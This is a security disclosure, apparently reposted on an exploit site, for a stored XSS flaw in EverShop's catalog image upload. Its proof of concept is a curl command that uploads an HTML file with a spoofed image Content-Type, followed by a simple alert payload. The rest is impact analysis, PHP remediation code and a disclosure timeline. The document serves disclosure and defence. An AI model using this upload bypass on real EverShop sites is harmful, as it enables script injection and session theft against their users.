Share
## https://sploitus.com/exploit?id=5105E4EC-12F2-5777-8E75-A3DF306D1800
# Security Vulnerability Disclosure โ Stored XSS via File Upload in EverShop
## Overview
**Vulnerability Type:** Stored Cross-Site Scripting (XSS)
**Severity:** High (CVSS 3.1: 7.4)
**CVSS Vector:** `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N`
**Affected Component:** File Upload Endpoint
**Disclosure Date:** April 18, 2026
**Reporter:** Venukamatchi P
---
## Vulnerability Description
The EverShop application allows uploading files through the catalog images endpoint. The server validates file types based solely on the user-controlled `Content-Type` header, which can be easily spoofed by an attacker. This allows uploading malicious HTML files while masquerading them as images.
### Affected Endpoint
```
POST /api/images/catalog/{id}/{id}
```
### Root Cause
1. **Trusting user-controlled Content-Type header** - No server-side validation of actual file content
2. **Lack of file extension validation** - Extensions are not verified against allowed types
3. **Unsafe file serving** - Uploaded files are served without proper sanitization or content-type restrictions
4. **Missing security headers** - No Content-Disposition or CSP headers to mitigate execution
---
## Proof of Concept
### Step 1: Upload Malicious File
```bash
curl -X POST "http:///api/images/catalog/7333/1221" \
-H "Cookie: " \
-F "images=@xss.html;type=image/jpeg"
```
### Step 2: Malicious Payload (`xss.html`)
```html
alert('XSS')
```
### Step 3: Access Uploaded File
The file becomes publicly accessible at:
```
http:///assets/catalog/7333/1221/xss.html
```
When a victim visits this URL, the JavaScript executes in their browser context.
**PIC:**
---
## Impact
| Impact | Severity |
|--------|----------|
| Execution of arbitrary JavaScript in victim's browser | High |
| Session hijacking via cookie theft | High |
| User account compromise | High |
| Potential for chaining with other vulnerabilities (e.g., RCE) | Critical |
### Attack Scenarios
1. **Session Hijacking:** Attacker steals admin session cookies to gain unauthorized access
2. **Phishing:** Inject fake login forms to capture credentials
3. **Defacement:** Modify page content to display malicious messages
4. **Malware Distribution:** Redirect users to malware download sites
5. **Privilege Escalation:** Chain with other vulnerabilities for full system compromise
---
## Remediation Recommendations
### Immediate Actions
1. **Validate File Content (Magic Bytes)**
```php
// Example: Check actual file content, not just headers
$allowedMimeTypes = ['image/jpeg', 'image/png', 'image/gif'];
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mimeType = $finfo->file($_FILES['images']['tmp_name']);
if (!in_array($mimeType, $allowedMimeTypes)) {
throw new Exception('Invalid file type');
}
```
2. **Restrict Allowed Extensions**
```php
$allowedExtensions = ['jpg', 'jpeg', 'png', 'gif'];
$extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
if (!in_array($extension, $allowedExtensions)) {
throw new Exception('Extension not allowed');
}
```
3. **Block Dangerous File Types**
- Explicitly block `.html`, `.htm`, `.svg`, `.js`, `.php`, `.exe` extensions
- Maintain a whitelist of allowed types (never use blacklists)
4. **Serve Files Safely**
```php
// Force download or set safe content-type
header('Content-Disposition: attachment; filename="' . $filename . '"');
header('Content-Type: application/octet-stream');
```
5. **Implement Content Security Policy (CSP)**
```
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
```
### Long-Term Improvements
- Store uploaded files outside the web root and serve via proxy
- Implement file scanning for malicious content
- Add rate limiting on upload endpoints
- Log and monitor suspicious upload attempts
- Conduct regular security audits of file handling code
---
## Disclosure Timeline
| Date | Event |
|------|-------|
| April 18, 2026, 8:38 PM | Initial vulnerability report sent to EverShop support |
| April 18, 2026, 9:44 PM | CVSS severity and vector provided |
| May 2, 2026, 7:46 PM | Follow-up inquiry sent for status update |
| Pending | Awaiting vendor response and remediation |
---
## Contact
**Reporter:** Venukamatchi P
For questions or additional information regarding this disclosure, please contact the reporter directly.
---
## References
- [OWASP File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html)
- [OWASP Stored XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
- [CVSS v3.1 Specification](https://www.first.org/cvss/specification-document)
- [Content Security Policy (CSP) Guide](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)
---
*This document is provided for educational and remediation purposes only. Unauthorized exploitation of this vulnerability is illegal and unethical.*